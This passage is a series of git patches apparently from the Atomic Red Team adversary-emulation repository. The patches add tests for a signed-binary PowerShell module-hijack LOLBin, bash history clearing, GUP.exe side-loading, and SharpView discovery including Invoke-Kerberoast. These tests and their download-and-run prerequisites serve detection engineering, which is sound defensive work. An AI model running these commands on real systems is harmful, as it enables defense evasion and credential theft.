From 91e0e61c94deabdd44fe731270ad299261c16948 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Mon, 28 Dec 2020 11:18:37 -0500 Subject: [PATCH 024/131] Adding RemoteFXvGPUDisablement.exe LOLBin coverage (#1341) * Update T1218.yaml Adding RemoteFXvGPUDisablement.exe LOLBIN coverage via AtomicTestHarnesses to T1218. Thanks, @MHaggis! * Update T1218.yaml Adding a more detailed description for this test. * Update T1218.yaml --- atomics/T1218/T1218.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index 1431cf7e..a7531989 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -178,3 +178,36 @@ atomic_tests: #{renamed_binary} #{xml_payload} output.txt name: powershell elevation_required: false +- name: Invoke-ATHRemoteFXvGPUDisablementCommand base test + description: | + RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). + + One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. + + Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. + + The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. + + Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + supported_platforms: + - windows + input_arguments: + module_name: + description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. + type: string + default: foo + module_path: + description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. + type: string + default: $PWD + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' + name: powershell From b699820fe345a04e7ea3f626e039534b7afb21a8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 28 Dec 2020 16:19:04 +0000 Subject: [PATCH 025/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1218/T1218.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index a7531989..4aca2242 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -179,6 +179,7 @@ atomic_tests: name: powershell elevation_required: false - name: Invoke-ATHRemoteFXvGPUDisablementCommand base test + auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db description: | RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 24b5a578..0ed5223c 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -641,3 +641,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 6afe288a-8a8b-4d33-a629-8d03ba9dad3a 24e55612-85f6-4bd6-ae74-a73d02e3441d 22cfde89-befe-4e15-9753-47306b37a6e3 +9ebe7901-7edf-45c0-b5c7-8366300919db From 527fd3b78bddbfbe70b094aa31def9bb869982e9 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Dec 2020 16:19:14 +0000 Subject: [PATCH 026/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 43 +++++++++++++++ atomics/T1218/T1218.md | 54 +++++++++++++++++++ 6 files changed, 101 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5379c2b3..05cfd87a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -492,6 +492,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e7b06daa..b2555df7 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -292,6 +292,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index b64b5c88..5e778201 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -898,6 +898,7 @@ - Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows] - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows] - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] + - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 4a6d592b..62c22ec4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -526,6 +526,7 @@ - Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows] - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows] - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows] + - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows] - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md) - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ca086f79..4e1eb1dd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -39090,6 +39090,49 @@ defense-evasion: #{renamed_binary} #{xml_payload} output.txt name: powershell elevation_required: false + - name: Invoke-ATHRemoteFXvGPUDisablementCommand base test + auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db + description: | + RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). + + One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. + + Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. + + The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. + + Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + supported_platforms: + - windows + input_arguments: + module_name: + description: Specifies a temporary module name to use. If -ModuleName is + not supplied, a 16-character random temporary module name is used. A PowerShell + module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses + module load order, a module name must be specified. + type: string + default: foo + module_path: + description: Specifies an alternate, non-default PowerShell module path + for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the + first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. + type: string + default: "$PWD" + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand + must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} + get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser + -Force + +' + executor: + command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} + -ModulePath #{module_path}' + name: powershell T1216: technique: id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index 738c180b..a1441aa2 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -18,6 +18,8 @@ - [Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions](#atomic-test-7---renamed-microsoftworkflowcompilerexe-payload-executions) +- [Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-8---invoke-athremotefxvgpudisablementcommand-base-test) +
@@ -304,4 +306,56 @@ write-host "you need to rename workflow complier before you run this test" +
+
+ +## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test +RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). + +One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. + +Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe. + +The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. + +Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo| +| module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules. | string | $PWD| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
From d9dcbd3decf38cab5e755c8d29500e90dbabd7ea Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Mon, 28 Dec 2020 16:45:17 -0600 Subject: [PATCH 027/131] T1070.003 test7 cleanup (#1345) * Update T1070.003.yaml Added cleanup command to test "Clear and Disable Bash History Logging" * Update T1070.003.yaml corrected spacing * Update T1070.003.yaml changed echo set -o to a sed replace command --- atomics/T1070.003/T1070.003.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/atomics/T1070.003/T1070.003.yaml b/atomics/T1070.003/T1070.003.yaml index 7b9db85d..d3328571 100644 --- a/atomics/T1070.003/T1070.003.yaml +++ b/atomics/T1070.003/T1070.003.yaml @@ -81,6 +81,10 @@ atomic_tests: echo 'set +o history' >> ~/.bashrc . ~/.bashrc history -c + cleanup_command: | + sed -i 's/set +o history//g' ~/.bashrc + . ~/.bashrc + set -o history name: sh - name: Use Space Before Command to Avoid Logging to History auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 From 582d2e97f836f2081db9eb7513b1c8b0588092d7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Dec 2020 22:45:56 +0000 Subject: [PATCH 028/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++++ atomics/T1070.003/T1070.003.md | 6 ++++++ 2 files changed, 10 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4e1eb1dd..dc22ce1e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -26688,6 +26688,10 @@ defense-evasion: echo 'set +o history' >> ~/.bashrc . ~/.bashrc history -c + cleanup_command: | + sed -i 's/set +o history//g' ~/.bashrc + . ~/.bashrc + set -o history name: sh - name: Use Space Before Command to Avoid Logging to History auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 0d630a36..b266c6cb 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -202,6 +202,12 @@ echo 'set +o history' >> ~/.bashrc history -c ``` +#### Cleanup Commands: +```sh +sed -i 's/set +o history//g' ~/.bashrc +. ~/.bashrc +set -o history +``` From c4f6609515db44db8ee8ffb79b18713c2ea26166 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 28 Dec 2020 16:02:35 -0700 Subject: [PATCH 029/131] update gup.exe download link --- atomics/T1574.002/T1574.002.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1574.002/T1574.002.yaml b/atomics/T1574.002/T1574.002.yaml index 5075cef2..a7d0d460 100644 --- a/atomics/T1574.002/T1574.002.yaml +++ b/atomics/T1574.002/T1574.002.yaml @@ -25,10 +25,10 @@ atomic_tests: if (Test-Path #{gup_executable}) {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe" -OutFile "#{gup_executable}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" executor: command: | #{gup_executable} cleanup_command: | taskkill /F /IM #{process_name} >nul 2>&1 - name: command_prompt \ No newline at end of file + name: command_prompt From aa9f47cdaef053796c675dbd53db47a2dc0e29c3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 29 Dec 2020 14:18:50 +0000 Subject: [PATCH 030/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 +++--- atomics/T1574.002/T1574.002.md | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index dc22ce1e..246a2d24 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -2390,7 +2390,7 @@ privilege-escalation: ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe" -OutFile "#{gup_executable}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" executor: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 @@ -11503,7 +11503,7 @@ persistence: ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe" -OutFile "#{gup_executable}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" executor: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 @@ -27979,7 +27979,7 @@ defense-evasion: ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe" -OutFile "#{gup_executable}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" executor: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index cef0ca58..cfe6cca2 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -52,7 +52,7 @@ if (Test-Path #{gup_executable}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe" -OutFile "#{gup_executable}" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" ``` From bb9c4b1f6f760d000477fa75ed92883bbacbc643 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Fri, 1 Jan 2021 17:43:33 -0600 Subject: [PATCH 031/131] T1049 update (#1347) * T1049-Update * T1049-Update * T1049-Update Co-authored-by: Toua Lor --- atomics/T1049/T1049.yaml | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index 07e2a22c..c50b9527 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -50,3 +50,40 @@ atomic_tests: who -a name: sh +- name: System Discovery using SharpView + description: | + Get a listing of network connections, domains, domain users, and etc. + sharpview.exe located in the bin folder, an opensource red-team tool. + Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + supported_platforms: + - windows + input_arguments: + SharpView_url: + description: sharpview download URL + type: url + default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true + SharpView: + description: Path of the executable opensource redteam tool used for the performing this atomic. + type: path + default: PathToAtomicsFolder\T1049\bin\SharpView.exe + syntax: + description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. + type: String + default: | + "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare" + dependency_executor_name: powershell + dependencies: + - description: | + Sharpview.exe must exist on disk at specified location (#{SharpView}) + prereq_command: | + if (Test-Path #{SharpView}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + executor: + name: powershell + elevation_required: true + command: | + $syntaxList = #{syntax} + foreach ($syntax in $syntaxList) { + #{SharpView} $syntax -} From 871cab05dd3dfe82eee8f6cc111cccc7cc5fda96 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 1 Jan 2021 23:43:46 +0000 Subject: [PATCH 032/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1049/T1049.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index c50b9527..3936e3f9 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -51,6 +51,7 @@ atomic_tests: name: sh - name: System Discovery using SharpView + auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 description: | Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 0ed5223c..02463d55 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -642,3 +642,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 24e55612-85f6-4bd6-ae74-a73d02e3441d 22cfde89-befe-4e15-9753-47306b37a6e3 9ebe7901-7edf-45c0-b5c7-8366300919db +96f974bb-a0da-4d87-a744-ff33e73367e9 From aed82f62972383bc94c01e189bdd0c5ca2a5bade Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 1 Jan 2021 23:43:53 +0000 Subject: [PATCH 033/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 42 ++++++++++++++++ atomics/T1049/T1049.md | 50 +++++++++++++++++++ 6 files changed, 96 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 05cfd87a..ec371714 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -660,6 +660,7 @@ discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh +discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b2555df7..70c42fb0 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -465,6 +465,7 @@ discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Acti discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell +discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell discovery,T1007,System Service Discovery,1,System Service Discovery,89676ba1-b1f8-47ee-b940-2e1a113ebc71,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 5e778201..37dc3296 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1155,6 +1155,7 @@ - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos] + - Atomic Test #4: System Discovery using SharpView [windows] - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #2: System Owner/User Discovery [linux, macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 62c22ec4..503a9d2d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -851,6 +851,7 @@ - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] + - Atomic Test #4: System Discovery using SharpView [windows] - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] diff --git a/atomics/Indexes/index.yaml 